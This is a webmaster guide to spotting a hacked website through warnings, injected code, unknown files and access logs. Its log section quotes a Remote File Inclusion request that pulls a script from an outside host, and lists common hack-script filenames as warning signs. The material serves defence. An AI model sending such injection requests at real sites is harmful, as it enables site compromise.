How to know if your website has been hacked
This article is part of a set that begins at:
Symptoms that your website is hacked
1) Google says "This site may harm your computer"
If Google or Yahoo search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.
2) Visitors report getting viruses from your web pages
If visitors report to you that they get viruses or antivirus alerts from browsing
your pages, it usually means your
site
has been hacked. Google and Yahoo will soon start displaying malware warnings about your site, so see the article about it,
above.
It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above.
3) Visitors report being redirected to other websites
If you or other people try to visit your website but get automatically taken to some other website instead, it's another symptom of being hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.
4) Your traffic decreases dramatically and suddenly
Most web surfers stay away from sites that have the warning "This site may harm your computer". Those who continue to the site and get a virus or antivirus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.
5) Your files contain code you didn't put there
If your pages suddenly contain links, text, or other objects you didn't put there, it's an indication you've been hacked. The source code of your pages (the text in your .htm, .html, or .php files, for example) should always stay the same as it was when you created it. If it changes, it's an indication someone figured out how to break into your site and change it. That should never happen.
One exception is that free webhosts sometimes require that you allow them to put ads into your pages. Occasionally someone thinks they've been hacked when it's really just the webhost's advertising code. If in doubt and you use free hosting, read the Terms of Service of your hosting plan.
6) Your site contains files you didn't put there
This is just like #5 above, except there are entire new files. It can be harder to make a judgment about new files because a site usually does contain files you didn't put there, many of them necessary for proper functioning (although most are in folders whose names are an indication of what they're for). You can examine text files to see if their contents look suspicious. Don't delete files just because you don't recognize them. Once you're afraid you might have been hacked, everything can look suspicious, even things that were always there that you just never noticed before.
7) Your search engine result page (SERP) listings suddenly change
When your site appears in search result listings, the pages listed should be pages that you know really exist, and the text shown should be related to what your site is about. If the listings suddenly show weird-named pages or text about topics unrelated to your site's content, it's another symptom of being hacked.
Places where you can monitor your site status
An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.
1) Each time you log into cPanel
Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.
2) Google Webmaster Central > Webmaster Tools
Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com.
Google Webmaster Tools has other useful features. You can review the words and phrases of web searches for which your pages are being listed (make sure the phrases are relevant to your site's content), review errors that Googlebot has encountered on your site, and more.
3) Google Safe Browsing Diagnostic database
Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:
http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM
I wrote a few paragraphs about how to interpret the diagnostic report here.
4) StopBadware.org Clearinghouse database
If your site is flagged, you'll find a short summary of badware behavior found.
5) Norton Safe Web, from Symantec
Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):
http://safeweb.norton.com/report/show?url=EXAMPLE.COM
6) McAfee SiteAdvisor safety and outlink reports
The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.
7) W3C HTML Validator
If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files. The reported validation errors might be at exactly the locations where the injected code is.
8) Search engine result pages (SERPs)
At each of the popular search engines, watch for:
- Pages that the search engine says are on your site, but that you didn't put there.
- Text snippets that are wrong, containing text not related to your site's subject.
9) When you browse your own site
Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts delivering malware. Use "real-time" (also known as "on access") protection that catches malicious files as soon they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.
Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to recognize.
It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above.
Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger).
The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.
10) You can search your site files for suspicious code
This customizable PHP script can help search your website files for suspicious code or other suspicious text.
11) HTTP access log
This log records the requests for pages and other files from your site. When someone attacks your site (whether successfully or not), the attack is often recorded in your website access logs.
If you want to discover whether your site is being attacked, my hack attempt identifier online calculator can help with that. You paste lines from your HTTP log to find out which ones are hack attempts. Remember that just because an attack occurred doesn't mean it was successful, but it's still useful to know what you're up against.
Besides the information provided by the calculator, there are other indicators of a site compromise. If there are successful requests (HTTP result code 200) in your log for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.
Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:
- This one is a "Remote File Inclusion" (RFI) attack on your site. The GET command is requesting your index.php. It is trying to use the "query string" (the part after the first question mark) to inject safe.txt from the other site into your site. This is cause for concern because if it succeeds, your site will be hacked. However, this log line does not mean it has succeeded. It is just an attempt, and it is normal to find many of these attempts in your logs:
GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt?
- If the attack on your site does succeed (which you cannot determine from your log data alone), here is what famousuniversity will see in their log. This is a sign, to them, that they have been hacked. This GET is requesting safe.txt. If the result code is 200 (Success), it means the file was served, so it must be on the server. If they know that a file called safe.txt shouldn't be there, it means they were hacked and it was put there by somebody else, so they should find and examine the file. It is usually a PHP script intended to be used in attacks on other sites. I use famousuniversity as an example because my site actually has been attacked with scripts hosted at famous universities whose user accounts were compromised. It happens.
GET /user/safe.txt
As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against.
Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.
Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.
11) FTP access log
Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.
Questions are welcome in the discussion forum.
